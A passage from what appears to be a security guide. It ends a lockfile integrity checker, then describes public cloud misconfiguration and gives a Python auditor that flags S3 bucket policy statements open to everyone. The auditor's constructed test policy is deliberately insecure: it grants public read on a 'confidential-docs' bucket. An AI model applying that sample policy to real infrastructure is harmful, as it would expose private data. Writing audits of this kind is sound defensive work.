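    integrity = entry.get("integrity")
    if not integrity:
        return "unpinned: lock entry has no integrity field"
    if verify_integrity(tarball, integrity):
        return "ok"
    return "MISMATCH: tarball differs from the one that was locked"

# Constructed samples: the package as it was when the lock was written, and its lock entry
PACKAGE_V1 = b"constructed package contents for demo-lib 1.0.0"
LOCK_ENTRY = {
    "version": "1.0.0",
    "resolved": "https://registry.example/demo-lib/-/demo-lib-1.0.0.tgz",
    "integrity": compute_integrity(PACKAGE_V1),
}
```

A hash pin only helps when the lockfile is committed and the install is run in a mode that refuses to update it (for npm that is `npm ci`); it catches a tarball that changed after the pin was taken, not a malicious version that was pinned in the first place, which is what dependency review and delayed adoption of new versions are for.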
20. Public Cloud Misconfiguration
Description: Misconfigured cloud resources exposing sensitive data publicly.
Why and for what: Data leaks, compliance violations.
Attack example: An AWS S3 bucket is left public with confidential documents accessible to anyone.
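Added example (Python, not from the original guide): an audit over an S3 bucket policy document that flags statements granting access to everyone, the configuration behind the public-bucket scenario above. The policy JSON, bucket name, account id and VPC endpoint id are constructed; the policy grammar (Statement, Effect, Principal, Action, Condition) is AWS's own.

```python
import json

def _as_list(value) -> list:
    return value if isinstance(value, list) else [value]

def is_public_principal(principal) -> bool:
    # Both forms mean "anyone, including anonymous callers"
    if principal == "*":
        return True
    if isinstance(principal, dict):
        return "*" in _as_list(principal.get("AWS", []))
    return False

def find_public_statements(policy_json: str) -> list:
    """Allow statements whose Principal is everyone. Conditioned ones are reported too,
    marked separately, because only a reviewer can judge whether the condition is tight."""
    policy = json.loads(policy_json)
    findings = []
    for index, statement in enumerate(_as_list(policy.get("Statement", []))):
        if statement.get("Effect") != "Allow":
            continue
        if not is_public_principal(statement.get("Principal")):
            continue
        findings.append({
            "statement": index,
            "sid": statement.get("Sid"),
            "actions": _as_list(statement.get("Action", [])),
            "conditioned": "Condition" in statement,
        })
    return findings

# Constructed sample policy: one fully public read, one public-but-conditioned, one scoped to a role
SAMPLE_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [
        {"Sid": "PublicRead", "Effect": "Allow", "Principal": "*",
         "Action": "s3:GetObject", "Resource": "arn:aws:s3:::confidential-docs/*"},
        {"Sid": "VpcOnly", "Effect": "Allow", "Principal": {"AWS": "*"},
         "Action": "s3:GetObject", "Resource": "arn:aws:s3:::confidential-docs/*",
         "Condition": {"StringEquals": {"aws:SourceVpce": "vpce-EXAMPLE"}}},
        {"Sid": "TeamWrite", "Effect": "Allow",
         "Principal": {"AWS": "arn:aws:iam::123456789012:role/docs-writer"},
         "Action": ["s3:PutObject"], "Resource": "arn:aws:s3:::confidential-docs/*"},
    ],
})
```

The policy is only one of the ways a bucket becomes public; bucket and object ACLs are another, which is why the account-level Block Public Access setting, which overrides both, is the control to turn on first and then audit policies like this for exceptions.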